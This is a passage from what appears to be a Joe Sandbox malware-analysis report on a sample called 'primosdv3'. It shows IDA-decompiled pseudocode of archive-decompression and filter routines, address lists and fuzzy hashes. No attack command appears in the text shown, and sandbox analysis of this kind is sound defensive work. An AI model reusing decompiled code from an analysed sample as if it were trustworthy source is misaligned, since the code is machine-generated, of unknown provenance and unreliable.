														_t243 = _t356 >> 3;
														 *_t465 =  *_t465 + _t243;
														 *(_t479 + 0x30) = _t357;
														_t358 = 0x10;
														_t361 =  *((intOrPtr*)(_t466 + 0x2d38 + _t326 * 4)) + (_t442 -  *((intOrPtr*)(_t466 + 0x2cf4 + _t326 * 4)) >> _t358 - _t326);
														__eflags = _t361 -  *((intOrPtr*)(_t466 + 0x2cf4));
														asm("sbb eax, eax");
														_t244 = _t243 & _t361;
														__eflags = _t244;
														_t245 =  *(_t466 + 0x397c + _t244 * 2) & 0x0000ffff;
														L87:
														_t246 = _t245 & 0x0000ffff;
														__eflags = _t246 - 8;
														if(_t246 >= 8) {
															_t362 = 3;
															_t329 = (_t246 >> 2) - 1;
															_t445 = ((_t246 & _t362 | 0x00000004) << _t329) + 2;
															 *(_t479 + 0x2c) = _t445;
															__eflags = _t329;
															if(_t329 != 0) {
																_t250 = E00C6A89D(_t465);
																_t365 = 0x10;
																_t445 =  *(_t479 + 0x2c) + (_t250 >> _t365 - _t329);
																_t368 =  *(_t479 + 0x30) + _t329;
																 *_t465 =  *_t465 + (_t368 >> 3);
																_t369 = _t368 & 0x00000007;
																__eflags = _t369;
																_t465[1] = _t369;
															}
														} else {
															_t445 = _t246 + 2;
														}
														_t470[1] = _t445;
														L33:
														_t322 =  *(_t479 + 0x10);
														L34:
														_t436 =  *(_t479 + 0x1c);
														_t223 =  *(_t479 + 0x20);
														_t468 =  *(_t479 + 0x14);
														continue;
													}
													_t371 = _t466 + 0x2cf8 + _t241 * 4;
													while(1) {
														__eflags = _t442 -  *_t371;
														if(_t442 <  *_t371) {
															break;
														}
														_t241 = _t241 + 1;
														_t371 = _t371 + 4;
														__eflags = _t241 - 0xf;
														if(_t241 < 0xf) {
															continue;
														}
														goto L86;
													}
													_t326 = _t241;
													goto L86;
												}
												_t372 = 0x10;
												_t447 = _t442 >> _t372 - _t240;
												_t331 = ( *(_t447 + _t466 + 0x2d7c) & 0x000000ff) + _t465[1];
												 *_t465 =  *_t465 + (_t331 >> 3);
												_t332 = _t331 & 0x00000007;
												_t465[1] = _t332;
												_t245 =  *(_t466 + 0x317c + _t447 * 2) & 0x0000ffff;
												 *(_t479 + 0x30) = _t332;
												goto L87;
											}
											 *_t470 = 2;
											goto L33;
										}
										_push(_t479 + 0x38);
										E00C73F9D( *((intOrPtr*)(_t479 + 0x34)), _t465);
										_t322 =  *(_t479 + 0x10);
										_t470[1] =  *(_t479 + 0x38) & 0x000000ff;
										_t470[2] =  *(_t479 + 0x3c);
										_t448 = 4;
										 *_t470 = _t448;
										_t260 =  *(_t466 + 0x4ad8);
										_t376 = _t260 * 0xc +  *_t322;
										 *(_t466 + 0x4ad8) = _t260 + 1;
										_t376[1] =  *(_t479 + 0x44) & 0x000000ff;
										 *_t376 = _t448;
										_t376[2] =  *(_t479 + 0x40);
										goto L34;
									}
									_t264 = _t353 - 0x106;
									__eflags = _t264 - 8;
									if(_t264 >= 8) {
										_t449 = 3;
										_t379 = (_t264 >> 2) - 1;
										 *(_t479 + 0x30) = _t379;
										 *(_t479 + 0x24) = ((_t264 & _t449 | 0x00000004) << _t379) + 2;
										__eflags = _t379;
										if(_t379 != 0) {
											_t305 = E00C6A89D(_t465);
											_t340 = _t325 +  *(_t479 + 0x30);
											_t422 = 0x10;
											 *(_t479 + 0x24) =  *(_t479 + 0x24) + (_t305 >> _t422 -  *(_t479 + 0x30));
											_t425 =  *(_t479 + 0x18) + (_t340 >> 3);
											_t325 = _t340 & 0x00000007;
											__eflags = _t325;
											 *(_t479 + 0x18) = _t425;
											 *_t465 = _t425;
											_t465[1] = _t325;
										}
									} else {
										 *(_t479 + 0x24) = _t264 + 2;
									}
									_t269 = E00C6A89D(_t465);
									_t270 =  *(_t466 + 0xfa0);
									_t451 = _t269 & 0x0000fffe;
									__eflags = _t451 -  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4));
									if(_t451 >=  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4))) {
										_t333 = 0xf;
										_t271 = _t270 + 1;
										__eflags = _t271 - _t333;
										if(_t271 >= _t333) {
											L49:
											_t382 = _t465[1] + _t333;
											_t383 = _t382 & 0x00000007;
											_t465[1] = _t383;
											 *_t465 =  *_t465 + (_t382 >> 3);
											_t274 =  *_t465;
											 *(_t479 + 0x18) = _t383;
											_t384 = 0x10;
											 *(_t479 + 0x28) = _t274;
											_t387 =  *((intOrPtr*)(_t466 + 0xf60 + _t333 * 4)) + (_t451 -  *((intOrPtr*)(_t466 + 0xf1c + _t333 * 4)) >> _t384 - _t333);
											__eflags = _t387 -  *((intOrPtr*)(_t466 + 0xf1c));
											asm("sbb eax, eax");
											_t275 = _t274 & _t387;
											__eflags = _t275;
											_t276 =  *(_t466 + 0x1ba4 + _t275 * 2) & 0x0000ffff;
											goto L50;
										}
										_t418 = _t466 + 0xf20 + _t271 * 4;
										while(1) {
											__eflags = _t451 -  *_t418;
											if(_t451 <  *_t418) {
												break;
											}
											_t271 = _t271 + 1;
											_t418 = _t418 + 4;
											__eflags = _t271 - 0xf;
											if(_t271 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t333 = _t271;
										goto L49;
									} else {
										_t419 = 0x10;
										_t459 = _t451 >> _t419 - _t270;
										 *(_t479 + 0x30) = _t459;
										_t461 = ( *(_t459 + _t466 + 0xfa4) & 0x000000ff) + _t325;
										_t303 = (_t461 >> 3) +  *(_t479 + 0x18);
										_t462 = _t461 & 0x00000007;
										 *(_t479 + 0x28) = _t303;
										 *_t465 = _t303;
										_t465[1] = _t462;
										 *(_t479 + 0x18) = _t462;
										_t276 =  *(_t466 + 0x13a4 +  *(_t479 + 0x30) * 2) & 0x0000ffff;
										L50:
										_t277 = _t276 & 0x0000ffff;
										__eflags = _t277 - 4;
										if(_t277 >= 4) {
											_t473 = (_t277 >> 1) - 1;
											_t281 = ((_t277 & 0x00000001 | 0x00000002) << _t473) + 1;
											 *(_t479 + 0x30) = _t281;
											_t334 = _t281;
											__eflags = _t473;
											if(_t473 == 0) {
												L68:
												_t470 =  *(_t479 + 0x2c);
												L69:
												_t282 =  *(_t479 + 0x24);
												__eflags = _t334 - 0x100;
												if(_t334 > 0x100) {
													_t282 = _t282 + 1;
													__eflags = _t334 - 0x2000;
													if(_t334 > 0x2000) {
														_t282 = _t282 + 1;
														__eflags = _t334 - 0x40000;
														if(_t334 > 0x40000) {
															_t282 = _t282 + 1;
															__eflags = _t282;
														}
													}
												}
												 *_t470 = 1;
												_t470[1] = _t282;
												_t470[2] = _t334;
												goto L33;
											}
											__eflags = _t473 - 4;
											if(__eflags < 0) {
												_t283 = E00C78934(_t465);
												_t390 = 0x20;
												_t334 = (_t283 >> _t390 - _t473) +  *(_t479 + 0x30);
												_t393 =  *(_t479 + 0x18) + _t473;
												_t394 = _t393 & 0x00000007;
												__eflags = _t394;
												 *_t465 = (_t393 >> 3) +  *(_t479 + 0x28);
												_t465[1] = _t394;
												goto L68;
											}
											if(__eflags <= 0) {
												_t474 =  *(_t479 + 0x28);
											} else {
												_t298 = E00C78934(_t465);
												_t411 = 0x24;
												_t334 = (_t298 >> _t411 - _t473 << 4) +  *(_t479 + 0x30);
												_t415 =  *(_t479 + 0x18) + 0xfffffffc + _t473;
												_t474 =  *(_t479 + 0x28) + (_t415 >> 3);
												_t416 = _t415 & 0x00000007;
												 *_t465 = _t474;
												 *(_t479 + 0x18) = _t416;
												_t465[1] = _t416;
											}
											_t287 = E00C6A89D(_t465);
											_t288 =  *(_t466 + 0x1e8c);
											_t455 = _t287 & 0x0000fffe;
											__eflags = _t455 -  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4));
											if(_t455 >=  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4))) {
												_t475 = 0xf;
												_t289 = _t288 + 1;
												__eflags = _t289 - _t475;
												if(_t289 >= _t475) {
													L65:
													_t397 = _t465[1] + _t475;
													_t465[1] = _t397 & 0x00000007;
													_t291 = _t397 >> 3;
													 *_t465 =  *_t465 + _t291;
													_t399 = 0x10;
													_t402 =  *((intOrPtr*)(_t466 + 0x1e4c + _t475 * 4)) + (_t455 -  *((intOrPtr*)(_t466 + 0x1e08 + _t475 * 4)) >> _t399 - _t475);
													__eflags = _t402 -  *((intOrPtr*)(_t466 + 0x1e08));
													asm("sbb eax, eax");
													_t292 = _t291 & _t402;
													__eflags = _t292;
													_t293 =  *(_t466 + 0x2a90 + _t292 * 2) & 0x0000ffff;
													goto L66;
												}
												_t404 = _t466 + 0x1e0c + _t289 * 4;
												while(1) {
													__eflags = _t455 -  *_t404;
													if(_t455 <  *_t404) {
														break;
													}
													_t289 = _t289 + 1;
													_t404 = _t404 + 4;
													__eflags = _t289 - 0xf;
													if(_t289 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t475 = _t289;
												goto L65;
											} else {
												_t405 = 0x10;
												_t458 = _t455 >> _t405 - _t288;
												_t408 = ( *(_t458 + _t466 + 0x1e90) & 0x000000ff) +  *(_t479 + 0x18);
												 *_t465 = (_t408 >> 3) + _t474;
												_t465[1] = _t408 & 0x00000007;
												_t293 =  *(_t466 + 0x2290 + _t458 * 2) & 0x0000ffff;
												L66:
												_t334 = _t334 + (_t293 & 0x0000ffff);
												goto L68;
											}
										}
										_t334 = _t277 + 1;
										goto L69;
									}
								}
								__eflags =  *(_t466 + 0x4ad8) - 1;
								if( *(_t466 + 0x4ad8) <= 1) {
									L35:
									 *_t470 =  *_t470 & 0x00000000;
									_t470[2] = _t353;
									_t470[1] = 0;
									goto L33;
								}
								__eflags =  *(_t470 - 0xc);
								if( *(_t470 - 0xc) != 0) {
									goto L35;
								}
								_t310 =  *(_t470 - 8) & 0x0000ffff;
								_t463 = 3;
								__eflags = _t310 - _t463;
								if(_t310 >= _t463) {
									goto L35;
								}
								_t311 = _t310 + 1;
								 *(_t470 - 8) = _t311;
								 *((_t311 & 0x0000ffff) + _t470 - 4) = _t353;
								_t72 = _t466 + 0x4ad8;
								 *_t72 =  *(_t466 + 0x4ad8) - 1;
								__eflags =  *_t72;
								goto L33;
							}
						}
					}
					L3:
					 *((char*)(_t466 + 0x4ad0)) = 1;
					return _t220;
				}
				 *((char*)(_t466 + 0x2c)) = 1;
				_push(_t466 + 0x30);
				_push(_t321);
				_push(_t465);
				_t220 = E00C743BF(__ecx);
				if(_t220 == 0) {
					goto L3;
				}
				goto L2;
			}

0x00c77158
0x00c7715d
0x00c77165
0x00c77168
0x00c7716b
0x00c77180
0x00c77183
0x00c77185
0x00c77189
0x00c771a1
0x00c771a8
0x00c771aa
0x00c771ad
0x00c771b1
0x00c771b6
0x00c771b8
0x00c771c2
0x00c771c4
0x00c771ba
0x00c771ba
0x00c771bc
0x00c771bc
0x00c771c8
0x00c771ce
0x00c771ce
0x00c771d0
0x00c771d4
0x00c771d6
0x00000000
0x00000000
0x00c771d8
0x00c771da
0x00c777b6
0x00000000
0x00c777b6
0x00c771e0
0x00c771ee
0x00c771ee
0x00c771f0
0x00c771ff
0x00c771ff
0x00c77205
0x00c77207
0x00c7720b
0x00c77211
0x00c777af
0x00c777af
0x00000000
0x00c777af
0x00000000
0x00c77211
0x00c771f2
0x00c771f9
0x00000000
0x00000000
0x00000000
0x00c771f9
0x00c771e2
0x00c771e5
0x00c771e8
0x00000000
0x00000000
0x00000000
0x00c77217
0x00c77217
0x00c77220
0x00c77226
0x00c77228
0x00c7722b
0x00c77234
0x00c77235
0x00c7723c
0x00c77240
0x00c77242
0x00c77249
0x00c77249
0x00c7724e
0x00c7724e
0x00c77250
0x00c7725b
0x00c7725e
0x00c77262
0x00c77268
0x00c7726f
0x00c77275
0x00c7727b
0x00c7727f
0x00c772b2
0x00c772b3
0x00c772b4
0x00c772b8
0x00c772ba
0x00c772db
0x00c772de
0x00c772e2
0x00c772e8
0x00c772ec
0x00c772f0
0x00c772f4
0x00c772f9
0x00c77306
0x00c77308
0x00c7730b
0x00c7730d
0x00c7730d
0x00c7730f
0x00000000
0x00c7730f
0x00c772bf
0x00c772c2
0x00c772c2
0x00c772c4
0x00000000
0x00000000
0x00c772c6
0x00c772c7
0x00c772ca
0x00c772cd
0x00000000
0x00000000
0x00c772cf
0x00000000
0x00c772cf
0x00c772d5
0x00c772d7
0x00000000
0x00c77281
0x00c77283
0x00c77286
0x00c77290
0x00c77298
0x00c7729a
0x00c7729f
0x00c772a3
0x00c772a6
0x00c77317
0x00c77317
0x00c7731f
0x00c77321
0x00c77374
0x00c7737a
0x00c77630
0x00c77632
0x00c77686
0x00c7768c
0x00c7769c
0x00c7769d
0x00c776a8
0x00c776ab
0x00c776b2
0x00c776b8
0x00c776be
0x00c776c5
0x00c776f6
0x00c776f7
0x00c776f8
0x00c776fa
0x00c77716
0x00c77719
0x00c7771d
0x00c77720
0x00c77723
0x00c77726
0x00c7772f
0x00c77735
0x00c77741
0x00c77743
0x00c77749
0x00c7774b
0x00c7774b
0x00c7774d
0x00c77755
0x00c77755
0x00c77758
0x00c7775b
0x00c77769
0x00c7776c
0x00c77774
0x00c77777
0x00c7777b
0x00c7777d
0x00c77781
0x00c7778c
0x00c77795
0x00c77797
0x00c7779e
0x00c777a0
0x00c777a0
0x00c777a3
0x00c777a3
0x00c7775d
0x00c7775d
0x00c7775d
0x00c777a6
0x00c77350
0x00c77350
0x00c77354
0x00c77354
0x00c77358
0x00c7735c
0x00000000
0x00c7735c
0x00c77702
0x00c77705
0x00c77705
0x00c77707
0x00000000
0x00000000
0x00c77709
0x00c7770a
0x00c7770d
0x00c77710
0x00000000
0x00000000
0x00000000
0x00c77712
0x00c77714
0x00000000
0x00c77714
0x00c776c9
0x00c776cc
0x00c776d6
0x00c776de
0x00c776e0
0x00c776e3
0x00c776e6
0x00c776ee
0x00000000
0x00c776ee
0x00c7768e
0x00000000
0x00c7768e
0x00c7763c
0x00c7763e
0x00c77648
0x00c7764c
0x00c77654
0x00c77659
0x00c7765a
0x00c7765d
0x00c77666
0x00c77669
0x00c77674
0x00c7767c
0x00c7767e
0x00000000
0x00c7767e
0x00c77380
0x00c77386
0x00c77389
0x00c773a0
0x00c773a6
0x00c773af
0x00c773b3
0x00c773b7
0x00c773b9
0x00c773bd
0x00c773c2
0x00c773c8
0x00c773cf
0x00c773dc
0x00c773de
0x00c773de
0x00c773e1
0x00c773e5
0x00c773e7
0x00c773e7
0x00c7738b
0x00c77396
0x00c77396
0x00c773ec
0x00c773f3
0x00c773f9
0x00c773ff
0x00c77406
0x00c77446
0x00c77447
0x00c77448
0x00c7744a
0x00c77466
0x00c77469
0x00c7746d
0x00c77470
0x00c77476
0x00c7747f
0x00c77481
0x00c77487
0x00c7748a
0x00c77497
0x00c77499
0x00c7749f
0x00c774a1
0x00c774a1
0x00c774a3
0x00000000
0x00c774a3
0x00c77452
0x00c77455
0x00c77455
0x00c77457
0x00000000
0x00000000
0x00c77459
0x00c7745a
0x00c7745d
0x00c77460
0x00000000
0x00000000
0x00000000
0x00c77462
0x00c77464
0x00000000
0x00c77408
0x00c7740a
0x00c7740d
0x00c7740f
0x00c7741b
0x00c77422
0x00c77426
0x00c77429
0x00c7742d
0x00c77433
0x00c77436
0x00c7743a
0x00c774ab
0x00c774ab
0x00c774ae
0x00c774b1
0x00c774c5
0x00c774ca
0x00c774cb
0x00c774cf
0x00c774d1
0x00c774d3
0x00c775fa
0x00c775fa
0x00c775fe
0x00c775fe
0x00c77602
0x00c77608
0x00c7760a
0x00c7760b
0x00c77611
0x00c77613
0x00c77614
0x00c7761a
0x00c7761c
0x00c7761c
0x00c7761c
0x00c7761a
0x00c77611
0x00c7761d
0x00c77624
0x00c77628
0x00000000
0x00c77628
0x00c774d9
0x00c774dc
0x00c775d1
0x00c775da
0x00c775e3
0x00c775e7
0x00c775f2
0x00c775f2
0x00c775f5
0x00c775f7
0x00000000
0x00c775f7
0x00c774e2
0x00c7751d
0x00c774e4
0x00c774e6
0x00c774ef
0x00c774fe
0x00c77502
0x00c7750d
0x00c7750f
0x00c77512
0x00c77514
0x00c77518
0x00c77518
0x00c77523
0x00c7752a
0x00c77530
0x00c77536
0x00c7753d
0x00c7756d
0x00c7756e
0x00c7756f
0x00c77571
0x00c7758d
0x00c77590
0x00c77597
0x00c7759a
0x00c7759d
0x00c775a8
0x00c775b4
0x00c775b6
0x00c775bc
0x00c775be
0x00c775be
0x00c775c0
0x00000000
0x00c775c0
0x00c77579
0x00c7757c
0x00c7757c
0x00c7757e
0x00000000
0x00000000
0x00c77580
0x00c77581
0x00c77584
0x00c77587
0x00000000
0x00000000
0x00000000
0x00c77589
0x00c7758b
0x00000000
0x00c7753f
0x00c77541
0x00c77544
0x00c7754e
0x00c7755c
0x00c7755e
0x00c77561
0x00c775c8
0x00c775cb
0x00000000
0x00c775cb
0x00c7753d
0x00c774b3
0x00000000
0x00c774b3
0x00c77406
0x00c77323
0x00c7732a
0x00c77365
0x00c77365
0x00c7736b
0x00c7736e
0x00000000
0x00c7736e
0x00c7732c
0x00c77330
0x00000000
0x00000000
0x00c77332
0x00c77338
0x00c77339
0x00c7733c
0x00000000
0x00000000
0x00c7733e
0x00c7733f
0x00c77346
0x00c7734a
0x00c7734a
0x00c7734a
0x00000000
0x00c7734a
0x00c7727f
0x00c771ce
0x00c7718b
0x00c7718b
0x00000000
0x00c7718b
0x00c77170
0x00c77174
0x00c77175
0x00c77176
0x00c77177
0x00c7717e
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c27889c8047537e5d39ad2a54aa45f4e238dc8fec9469e54bf1c8dc5b219386
Instruction ID: c8d5dc3665dff1b7ca0c88f85602ddddcbf0598928fd70197a2d0e49374ff243
Opcode Fuzzy Hash: 4c27889c8047537e5d39ad2a54aa45f4e238dc8fec9469e54bf1c8dc5b219386
Instruction Fuzzy Hash: 7112D4B161870A9FC718CF28C490A79B7E1FF94304F148A2EE99AC7781E334E995DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00C6C426 Relevance: .5, Instructions: 454
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C6C426(signed char** __ecx) {
				void* __edi;
				void* _t188;
				signed int _t189;
				char _t192;
				void* _t197;
				void* _t198;
				signed int _t201;
				signed char _t202;
				void* _t212;
				signed int _t213;
				signed int _t215;
				signed int _t216;
				signed char* _t217;
				void* _t218;
				intOrPtr _t222;
				signed char* _t225;
				signed char _t228;
				void* _t237;
				void* _t238;
				signed int _t239;
				signed int _t242;
				signed char* _t245;
				signed int _t277;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t281;
				void* _t282;
				signed int _t286;
				intOrPtr _t287;
				void* _t288;
				signed char* _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				char _t293;
				intOrPtr* _t295;
				signed char _t296;
				signed int _t301;
				signed int _t302;
				intOrPtr _t304;
				intOrPtr* _t306;
				signed char* _t307;
				signed int _t308;
				signed int _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed char _t320;
				intOrPtr _t321;
				intOrPtr _t322;
				unsigned int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t331;
				signed char _t332;
				signed char* _t333;
				signed char _t335;
				signed int _t336;
				signed int _t337;
				void* _t338;
				void* _t339;
				void* _t340;
				signed int _t343;
				signed int _t344;
				signed char* _t345;
				signed int _t346;
				signed int _t348;
				intOrPtr _t350;
				signed int _t351;
				signed int _t354;
				void* _t358;
				signed int _t359;
				signed char* _t360;
				signed int _t361;
				void* _t362;
				void* _t363;

				_t349 = __ecx;
				_t188 =  *((intOrPtr*)(_t363 + 4)) - 1;
				if(_t188 == 0) {
					L84:
					_t189 =  *(_t349 + 0x14);
					_t295 =  *_t349;
					_t350 =  *((intOrPtr*)(_t349 + 0x1c));
					_t288 = _t189 - 4;
					if(_t288 > 0x3fffc) {
						L96:
						return 0;
					}
					_t338 = 0;
					_t192 = (_t189 & 0xffffff00 |  *((intOrPtr*)(_t363 + 0x64)) == 0x00000002) + 0xe8;
					 *((char*)(_t363 + 0x13)) = _t192;
					if(_t288 == 0) {
						L95:
						return 1;
					} else {
						goto L86;
					}
					do {
						L86:
						_t321 =  *_t295;
						_t295 = _t295 + 1;
						_t339 = _t338 + 1;
						_t350 = _t350 + 1;
						if(_t321 == 0xe8 || _t321 == _t192) {
							_t322 =  *_t295;
							if(_t322 >= 0) {
								if(_t322 - 0x1000000 < 0) {
									 *_t295 = _t322 - _t350;
								}
							} else {
								if(_t350 + _t322 >= 0) {
									 *_t295 = _t322 + 0x1000000;
								}
							}
							_t192 =  *((intOrPtr*)(_t363 + 0x13));
							_t295 = _t295 + 4;
							_t338 = _t339 + 4;
							_t350 = _t350 + 4;
						}
					} while (_t338 < _t288);
					goto L95;
				}
				_t197 = _t188 - 1;
				if(_t197 == 0) {
					goto L84;
				}
				_t198 = _t197 - 1;
				if(_t198 == 0) {
					_t289 =  *__ecx;
					_t340 = __ecx[5] - 0x15;
					if(_t340 > 0x3ffeb) {
						goto L96;
					}
					_t325 = __ecx[7] >> 4;
					 *(_t363 + 0x28) = _t325;
					if(_t340 == 0) {
						goto L95;
					}
					_t343 = (_t340 - 1 >> 4) + 1;
					 *(_t363 + 0x38) = _t343;
					do {
						_t201 =  *_t289 & 0x1f;
						if(_t201 < 0x10) {
							goto L82;
						}
						_t202 =  *((intOrPtr*)(_t201 + 0xc9e078));
						if(_t202 == 0) {
							goto L82;
						}
						_t344 =  *(_t363 + 0x28);
						_t296 = 0;
						_t326 = _t202 & 0x000000ff;
						 *(_t363 + 0x30) = 0;
						 *(_t363 + 0x40) = _t326;
						_t358 = 0x12;
						do {
							if((_t326 & 1) != 0) {
								_t168 = _t358 + 0x18; // 0x2a
								if(E00C6C985(_t289, _t168, 4) == 5) {
									E00C6C9D0(_t289, E00C6C985(_t289, _t358, 0x14) - _t344 & 0x000fffff, _t358, 0x14);
								}
								_t326 =  *(_t363 + 0x3c);
								_t296 =  *(_t363 + 0x2c);
							}
							_t296 = _t296 + 1;
							_t358 = _t358 + 0x29;
							 *(_t363 + 0x2c) = _t296;
						} while (_t358 <= 0x64);
						_t343 =  *(_t363 + 0x38);
						_t325 =  *(_t363 + 0x28);
						L82:
						_t289 =  &(_t289[0x10]);
						_t325 = _t325 + 1;
						_t343 = _t343 - 1;
						 *(_t363 + 0x28) = _t325;
						 *(_t363 + 0x38) = _t343;
					} while (_t343 != 0);
					goto L95;
				}
				_t212 = _t198 - 1;
				if(_t212 == 0) {
					_t213 = __ecx[1];
					_t345 = __ecx[5];
					 *(_t363 + 0x18) = _t213;
					_t290 = _t213 - 3;
					if(_t345 - 3 > 0x1fffd || _t290 > _t345) {
						goto L96;
					} else {
						_t215 = __ecx[2];
						 *(_t363 + 0x20) = _t215;
						if(_t215 > 2) {
							goto L96;
						}
						_t216 =  *__ecx;
						 *(_t363 + 0x14) = _t216;
						_t359 = 3;
						_t351 =  &(_t345[_t216]);
						_t217 = 0;
						 *(_t363 + 0x24) = _t351;
						_t301 = _t351 - _t290;
						 *(_t363 + 0x30) = 0;
						 *(_t363 + 0x28) = _t301;
						do {
							_t291 = 0;
							if(_t217 >= _t345) {
								goto L65;
							}
							_t327 =  *(_t363 + 0x18);
							_t360 =  &(_t217[_t301]);
							_t302 =  *(_t363 + 0x14);
							_t225 =  *(_t363 + 0x18) + 0xfffffffd - _t351;
							 *(_t363 + 0x34) = _t225;
							do {
								if( &(_t225[_t360]) >= _t327) {
									 *(_t363 + 0x3c) =  *_t360 & 0x000000ff;
									 *(_t363 + 0x3c) =  *(_t360 - 3) & 0x000000ff;
									 *(_t363 + 0x44) = E00C8614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff));
									 *(_t363 + 0x38) = E00C8614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
									_t237 = E00C8614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
									_t304 =  *((intOrPtr*)(_t363 + 0x4c));
									_t363 = _t363 + 0xc;
									_t332 =  *(_t363 + 0x2c);
									if(_t304 > _t332 || _t304 > _t237) {
										_t302 =  *(_t363 + 0x14);
										_t327 =  *(_t363 + 0x18);
										_t291 =  *(_t363 + 0x3c);
										if(_t332 > _t237) {
											_t291 =  *(_t363 + 0x38);
										}
									} else {
										_t302 =  *(_t363 + 0x14);
										_t327 =  *(_t363 + 0x18);
									}
								}
								_t228 = _t291 -  *_t302;
								_t302 = _t302 + 1;
								(_t360 - 3)[_t327] = _t228;
								_t360 =  &(_t360[3]);
								_t291 = _t228 & 0x000000ff;
								 *(_t363 + 0x14) = _t302;
								_t225 =  *(_t363 + 0x34);
							} while ( &(( *(_t363 + 0x34))[_t360]) < _t345);
							_t217 =  *(_t363 + 0x30);
							_t301 =  *(_t363 + 0x28);
							_t351 =  *(_t363 + 0x24);
							_t359 = 3;
							L65:
							_t217 =  &(_t217[1]);
							 *(_t363 + 0x30) = _t217;
						} while (_t217 < _t359);
						_t328 =  *(_t363 + 0x20);
						_t218 = _t345 - 2;
						if(_t328 >= _t218) {
							goto L95;
						}
						_t306 = _t328 + 2 + _t351;
						_t331 = (_t218 - _t328 - 1) / _t359 + 1;
						do {
							_t222 =  *((intOrPtr*)(_t306 - 1));
							 *((intOrPtr*)(_t306 - 2)) =  *((intOrPtr*)(_t306 - 2)) + _t222;
							 *_t306 =  *_t306 + _t222;
							_t306 = _t306 + _t359;
							_t331 = _t331 - 1;
						} while (_t331 != 0);
						goto L95;
					}
				}
				_t238 = _t212 - 1;
				if(_t238 == 0) {
					_t307 = __ecx[5];
					_t333 =  *__ecx;
					_t239 = __ecx[1];
					 *(_t363 + 0x30) = _t333;
					 *(_t363 + 0x34) = _t307;
					 *(_t363 + 0x38) = _t239;
					 *(_t363 + 0x40) =  &(_t333[_t307]);
					if(_t307 > 0x20000 || _t239 > 0x80 || _t239 == 0) {
						goto L96;
					} else {
						_t346 = 0;
						 *(_t363 + 0x3c) = 0;
						if(_t239 == 0) {
							goto L95;
						} else {
							goto L20;
						}
						do {
							L20:
							 *(_t363 + 0x24) =  *(_t363 + 0x24) & 0x00000000;
							 *(_t363 + 0x20) =  *(_t363 + 0x20) & 0x00000000;
							_t354 = 0;
							 *(_t363 + 0x1c) =  *(_t363 + 0x1c) & 0x00000000;
							_t292 = 0;
							 *(_t363 + 0x18) =  *(_t363 + 0x18) & 0x00000000;
							_t361 = 0;
							 *(_t363 + 0x20) = 0;
							E00C7FFF0(_t346, _t363 + 0x44, 0, 0x1c);
							 *(_t363 + 0x38) =  *(_t363 + 0x38) & 0;
							_t363 = _t363 + 0xc;
							 *(_t363 + 0x28) = _t346;
							if(_t346 >=  *(_t363 + 0x34)) {
								_t242 =  *(_t363 + 0x38);
								goto L49;
							} else {
								goto L21;
							}
							do {
								L21:
								_t308 =  *(_t363 + 0x20);
								 *(_t363 + 0x18) = _t308 -  *(_t363 + 0x1c);
								_t245 =  *(_t363 + 0x30);
								 *(_t363 + 0x1c) = _t308;
								_t335 =  *_t245;
								 *(_t363 + 0x30) =  &(_t245[1]);
								_t314 = ( *(_t363 + 0x18) * _t354 + _t361 *  *(_t363 + 0x18) + _t292 *  *(_t363 + 0x20) +  *(_t363 + 0x24) * 0x00000008 >> 0x00000003 & 0x000000ff) - (_t335 & 0x000000ff);
								 *( *(_t363 + 0x28) +  *(_t363 + 0x40)) = _t314;
								_t357 = _t335 << 3;
								 *(_t363 + 0x24) = _t314 -  *(_t363 + 0x24);
								 *(_t363 + 0x28) = _t314;
								 *((intOrPtr*)(_t363 + 0x48)) =  *((intOrPtr*)(_t363 + 0x48)) + E00C8614A(_t335, _t335 << 3);
								 *((intOrPtr*)(_t363 + 0x50)) =  *((intOrPtr*)(_t363 + 0x50)) + E00C8614A(_t335, (_t335 << 3) -  *(_t363 + 0x20));
								 *((intOrPtr*)(_t363 + 0x58)) =  *((intOrPtr*)(_t363 + 0x58)) + E00C8614A(_t335,  *(_t363 + 0x24) + (_t335 << 3));
								 *((intOrPtr*)(_t363 + 0x60)) =  *((intOrPtr*)(_t363 + 0x60)) + E00C8614A(_t335, (_t335 << 3) -  *(_t363 + 0x24));
								 *((intOrPtr*)(_t363 + 0x68)) =  *((intOrPtr*)(_t363 + 0x68)) + E00C8614A(_t335,  *(_t363 + 0x28) + (_t335 << 3));
								 *((intOrPtr*)(_t363 + 0x70)) =  *((intOrPtr*)(_t363 + 0x70)) + E00C8614A(_t335, _t357 -  *(_t363 + 0x18));
								 *((intOrPtr*)(_t363 + 0x78)) =  *((intOrPtr*)(_t363 + 0x78)) + E00C8614A(_t335, _t357 +  *(_t363 + 0x18));
								_t363 = _t363 + 0x1c;
